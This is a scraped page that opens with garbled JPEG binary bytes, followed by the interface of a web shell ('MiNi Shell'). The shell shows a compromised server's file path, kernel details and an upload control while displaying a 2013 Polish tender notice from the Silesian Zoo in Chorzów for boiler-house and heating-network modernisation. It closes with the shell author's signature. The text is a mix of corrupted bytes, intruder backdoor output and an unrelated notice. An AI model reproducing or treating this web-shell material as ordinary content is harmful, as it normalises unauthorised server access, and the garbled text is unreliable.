JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130227/81304-N-2013.html

<p class="kh_header"><b>Chorzów: Modernizacja kotłowni gazowej w pawilonie Antylop wraz z modernizacją sieci ciepłowniczej i budową węzłów cieplnych zmieszania pompowego</b><br>
<b>Numer ogłoszenia: 81304 - 2013; data zamieszczenia: 27.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Śląski Ogród Zoologiczny , ul. Promenada Gen. Jerzego Ziętka 7, 41-501 Chorzów, woj. śląskie, tel. 666 031 496.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.silesia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu wojewódzkiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja kotłowni gazowej w pawilonie Antylop wraz z modernizacją sieci ciepłowniczej i budową węzłów cieplnych zmieszania pompowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiotem zamówienia są roboty instalacyjno-budowlane dotyczące:
1.	Modernizacji kotłowni gazowej, instalacji gazowej i elektrycznej, znajdującej się w pawilonie Antylop. Kotłownia zasila sieć ciepłowniczą, niskoparametrową.
2.	Modernizacji zewnętrznej sieci ciepłowniczej, niskoparametrowej do 10 budynków.
3.	Budowy węzłów cieplnych z zmieszaniem pompowym i układem regulacji pogodowej.

Ad1. Zakres robót obejmuje:
Roboty instalacyjne:
- Demontaż istniejących, gazowych kotłów atmosferycznych JUBAM 330 kW - 3szt.
- Demontaż istniejącej armatury kotłowej, wraz z pompami i orurowaniem.
- Demontaż istniejącej, wewnętrznej instalacji gazu (orurowanie, armatura, gazomierze).
- Demontaż urządzeń sanitarnych.
- Demontaż istniejących grzejników typu Favier.
- Montaż instalacji kanalizacyjnej.
- Montaż gazowych kotłów kondensacyjnych o mocy nominalnej 575 Kw - 2szt.
- Montaż armatury do kotłów (zawory, orurowanie, sprzęgło hydrauliczne).
- Montaż stacji uzdatniania wody SUW.
- Montaż pomp obiegowych (kotłowych, instalacji c.o.).
- Montaż instalacji wody zimnej.
- Montaż grzejników z armaturą i orurowaniem.
- Montaż zaworu z siłownikiem na przewodzie zasilającym istniejący podgrzewacz cwu.
- Montaż nowej, wewnętrznej instalacji gazu w pomieszczeniu kotłowni oraz prowadzonej w ziemi na zewnątrz budynku kotłowni do punktu pomiarowego.
- Montaż Aktywnego Systemu Bezpieczeństwa Instalacji Gazowej (ASBIG).
- Montaż wkładów kominowych, kanałów nawiewnych typu Z, wraz z czerpniami powietrza.
- Montaż przewodów doprowadzających powietrze do kotłów wraz z czerpniami dachowymi.
-Zabezpieczenie antykorozyjne przewodów stalowych.
- Próba szczelności całości instalacji, płukanie instalacji c.o. i wody zimnej.
- Odbiór kominiarski.
- Napełnienie instalacji oraz rozruch i regulacja instalacji c.o.
-Wykonanie izolacji przewodów.
- Montaż przyborów sanitarnych.
	
Roboty elektryczne:
- Zasilanie rozdzielni kotłowni.
- Zasilanie układów sterowania, kotłów, pomp, stacji SUW i ASBIG.
- Wymiana instalacji elektrycznej w kotłowni, (oświetlenie i gniazda).
- Pomiary instalacji elektrycznej.

	Roboty budowlane towarzyszące i remontowe:
- Rozbiórka 3 istniejących fundamentów pod kotły.
- Rozbiórka fundamentu pomp.
- Rozbiórka ściany działowej.
- Skrócenie istniejących kominów stalowych do wys. 3,00m powyżej poziomu dachu.
- Wykonanie wsporników na istniejących kominach, pod wprowadzenie wkładów.
- Rozbiórka istniejących płytek lastrykowych na posadzce i ścianach kotłowni.
- Wykonanie studzienki schładzającej z pompą odwadniającą.
- Wykonanie fundamentów pod kotły i zespół pomp.
- Przeróbka schodów przy wejściu wraz z wykonaniem nowej balustrady.
- Wykonanie przejść dachowych, z zabudową podstaw dachowych wraz z wywietrzakami  dachowymi.
- Wykonanie otworów z nadprożami pod istniejącymi oknami dla potrzeb wentylacji
nawiewnej.
- Remont pomieszczenia kotłowni (okładziny ścian, posadzek, malowanie).

Prace pomocnicze i uzupełniające:
- przeszkolenie pracowników Zamawiającego w zakresie obsługi kotłowni
- opracowanie i przekazanie Zamawiającemu 3-ch egzemplarzy instrukcji obsługi
  kotłowni i jednego na płycie CD z możliwością wydruku,
-składowanie elementów metalowych pochodzących z demontażu w miejscu 
  wskazanym przez Zamawiającego. 


Ad2. Zakres robót obejmuje:
Roboty ziemne:
- Wytyczenie projektowanej sieci w terenie.
- Wykonanie wykopów kontrolnych w miejscu kolizji z istniejącym uzbrojeniem.
- Wykonanie wykopu według wyznaczonej trasy, w tym zdjęcie humusu i jego
  składowanie obok wykopu oraz jego rozścielenie po zakończeniu robót.
- Wykonanie podsypki piaskowej.
- Zasypka piaskiem.
- Zasypanie wykopu z dogęszczeniem.
- Odtworzenie nawierzchni asfaltowych, trawników itp.

Roboty instalacyjne:
- Demontaż istniejących rurociągów, kanałów i komór zaworowych.
- Montaż nowego rurociągu w technologii rur preizolowanych wraz z instalacją alarmową,  zgodnie z projektem technicznym, (prace spawalnicze).
- Założenie rur osłonowych na kable energetyczne i gazociągi w miejscach kolizji                   z sieciami cieplnym.
- Montaż armatury odcinającej.
- Badania jakościowe połączeń spawanych.
- Płukanie sieci, próby ciśnieniowe i próba na gorąco.
- Test systemu alarmowego (test ma zawierać pełne informacje o systemie: długość
  pętli, rezystancja pętli i rezystancja izolacji - dla rurociągu zasilającego i powrotnego).
- Zabezpieczenie antykorozyjne przewodów stalowych.
- Sporządzenie geodezyjnej dokumentacji powykonawczej sieci ciepłowniczej. 

Roboty budowlane towarzyszące i remontowe:
- Roboty budowlane (przejścia sieci przez przegrody budowlane).
- Budowa studzienek zaworowych.

Ad3. Zakres robót obejmuje:
Roboty instalacyjne
- Demontaż istniejących węzłów, (urządzeń, armatury, orurowania).
- Montaż układów technologicznych.
- Montaż pomp, armatury i orurowania.
- Montaż podgrzewaczy CWU.
- Montaż szafek stalowych dla węzłów zmieszania pompowego.
- Zabezpieczenie antykorozyjne przewodów stalowych.
- Wykonanie izolacji przewodów.
Roboty elektryczne:
- Zasilenie układów sterowania oraz pomp. 
Roboty budowlane towarzyszące i remontowe:
- Remont budowlany pomieszczenia (dla węzłów zlokalizowanych w wydzielonych  pomieszczeniach: Dyrekcja, Żyrafy).
Prace pomocnicze i uzupełniające:
- przeszkolenie pracowników Zamawiającego w zakresie obsługi węzłów
- opracowanie i przekazanie Zamawiającemu 3-ch egzemplarzy instrukcji obsługi
  kotłowni i jednego na płycie CD z możliwością wydruku,
- składowanie elementów metalowych pochodzących z demontażu w miejscu 
  wskazanym przez Zamawiającego. 


Cały zakres prac wykonać w oparciu o dokumentację projektową:
1.	Projekty budowlano-wykonawcze.
2.	Przedmiary robót.
3.	Specyfikacje Techniczne Wykonania i Odbioru Robót.

UWAGA:
Zamawiający dopuszcza ujęcie w ofercie i zastosowanie materiałów i urządzeń równoważnych.
1.	Za równoważne uznane będą urządzenia i materiały spełniające poniższe warunki:
- Parametry techniczne, użytkowe i eksploatacyjne są co najmniej takie same lub lepsze od parametrów wymienionych w dokumentacji projektowej;
- Geometria, faktura, kolorystyka urządzeń i materiałów nie wpływa na przyjęte rozwiązania architektoniczno-konstrukcyjne;
- Nie prowadzą do zmiany rozwiązań projektowych,
2.	W przypadku wątpliwości co do równoważności zaproponowanych w ofercie zamienników, Zamawiający w porozumieniu z projektantem na etapie badania oferty może wymagać  wykazania (udokumentowania) równoważności. W przypadku niewykazania równoważności, oferty zostaną odrzucone jako niezgodne z wymaganiami SIWZ.
3.	Nie umieszczenie w zestawieniu zamiennych, równoważnych materiałów i urządzeń oznaczać będzie, że w trakcie realizacji prac zastosowane będą materiały i urządzenia wynikające z dokumentacji projektowej.
Warunki realizacji zamówienia.
Zamawiający informuje, że prace wykonywane będą w obiektach czynnych, co może wiązać się z utrudnieniami w miejscu wykonywania robót. Wykonawca uwzględniać musi ewentualne, mogące mieć wpływ na termin realizacji zamówienia,  przerwy w wykonywaniu prac..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.26.90-4, 45.30.00.00-0, 45.33.00.00-9, 45.33.30.00-0, 45.33.11.10-0, 45.11.13.00-1, 45.26.25.20-2, 45.31.00.00-3, 45.43.10.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.23.21.40-5, 45.23.32.52-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane w wysokości 50.000 zł (pięćdziesiąt tysięcy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy którzy spełniają warunki dotyczące:

a)	posiadania wiedzy i doświadczenia;
b)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
c)	sytuacji ekonomicznej i finansowej;

d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 pzp.
2.	Warunek określony w pkt 1.a) będzie uważany za spełniony, jeżeli Wykonawca dołączy do oferty wykaz robót budowlanych wykonanych w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
2.1. Warunek określony w pkt 1.a) będzie uważany za spełniony, jeżeli Wykonawca wykaże w wykazie, że wykonał w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
-  3 roboty budowlane polegające na wykonaniu remontu lub modernizacji kotłowni gazowej o wartości co najmniej 400 000,00 zł netto każda, 
- 3 roboty polegające na remoncie, budowie lub wymianie sieci ciepłowniczej , w tym co najmniej 1 robota o wartości nie mniejszej niż 800 000,00 zł netto, oraz 
- 3 roboty polegające na remoncie, budowie lub wymianie węzłów ciepłowniczych                  o wartości co najmniej 100 000,00 zł netto każda.

3. Warunek określony w pkt. 1.b) będzie uważany za spełniony, jeżeli Wykonawca dołączy do oferty oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia mają niżej wymienione uprawnienia:
- kierownik robót posiadający uprawnienia budowlane, do kierowania robotami budowlanymi:
- w specjalności ogólnobudowlanej (1 osoba),
- w specjalności instalacyjnej w zakresie sieci , instalacji i urządzeń: wodociągowych              i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych (1 osoba) oraz
- w specjalności instalacyjnej w zakresie instalacji elektrycznych (1 osoba).
4. Warunek określony w pkt. 1c zamawiający uzna za spełniony, jeżeli wykonawca dołączy do oferty informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na co najmniej 500.000 zł (pięćset tysięcy zł), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.1. Jeżeli wykonawca, wykazując spełnianie warunków udziału w postępowaniu                  w zakresie pkt. V.1c będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp,  zamawiający żąda dołączenia do oferty informacji, o której mowa w pkt. V.4 dotyczącej tego podmiotu.
5. Warunek określony w pkt. 1d zamawiający uzna za spełniony, jeżeli wykonawca dołączy do oferty oświadczenie o braku podstaw do wykluczenia z postępowania oraz  niżej wymienione dokumenty:
5.1. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5.2. aktualne zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt. 5.1 i 5.2 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
5. Jeżeli wykonawca, wykazując spełnianie warunków udziału w postępowaniu będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający żąda dołączenia do oferty niżej wymienionych dokumentów:
-   zakresu dostępnych wykonawcy zasobów innego podmiotu;
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
-  charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem;
-  zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
6. Jeżeli wykonawca, wykazując spełnianie warunków udziału w postępowaniu będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda dołączenia do oferty oświadczenia potwierdzającego brak podstaw do wykluczenia tych podmiotów z postępowania.
7. Do oferty należy dołączyć listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy  z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów, albo informację o tym, że wykonawca nie należy do grupy kapitałowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w następującym zakresie:
A.	Zmiany wynagrodzenia w przypadku:
1)	Zmiany stawki podatku VAT w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy;
2)	Ograniczenia zakresu prac objętych umową w przypadku stwierdzenia braku konieczności wykonania części zamówienia;
3)	Konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych niż wskazane w przedmiarze robót, czy opisie technicznym w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
4)	Robót dodatkowych, których nie dało się przewidzieć a które są niezbędne do wykonania zamówienia podstawowego;
5)	Podstawę obliczenia w/w kosztów zmian w umowie mających wpływ na wynagrodzenie wykonawcy stanowić będzie zatwierdzony przez zamawiającego przedmiar robót zamiennych i kosztorys ofertowy opracowany na podstawie cen jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do sporządzenia kosztorysu ofertowego wykonawcy, a w odniesieniu do nie występujących w kosztorysie ofertowym materiałów i sprzętu wg. cen jednostkowych nie wyższych niż średnie ceny SEKOCENBUDU dla I kwartału 2013r. z uwzględnieniem rabatów i upustów stosowanych dla tego rodzaju robót.

B.	Zmiany terminu zakończenia robót bez sankcji karnych dla Wykonawcy               w przypadkach:
1)	Wystąpienia okoliczności wymienionych w pkt. A3) jeżeli z powodu tych okoliczności nie jest możliwe dotrzymanie terminu realizacji;
2)	Wstrzymania robót przez zamawiającego;
3)	Wystąpienia skrajnie niekorzystnych warunków atmosferycznych powodujących iż realizacja robót będzie niemożliwa lub bardzo utrudniona, potwierdzonych wpisem do Dziennika Budowy;
4)	Decyzji organów administracji państwowej, jeżeli od nich uzależniona jest realizacja przedmiotu zamówienia.
C.	Pozostałe z uwzględnieniem sankcji karnych dla Wykonawcy tytułem opóźnienia robót:
1)	Zmiana podwykonawcy, jeżeli podwykonawca nie realizuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z wykonawcą;
2)	Zmiana w osobach przewidzianych do realizacji zamówienia w przypadku wystąpienia zdarzeń losowych lub jeżeli osoby nienależycie wykonują swoje obowiązki;
3)	Naruszenie przepisów BHP i wstrzymanie prac przez organ nadzoru budowlanego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.silesia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śląski Ogród Zoologiczny, 41-501 Chorzów, Promenada Gen. J. Ziętka 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2013 godzina 10:00, miejsce: Śląski Ogród Zoologiczny, 41-501 Chorzów, Promenada Gen. J. Ziętka 7, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com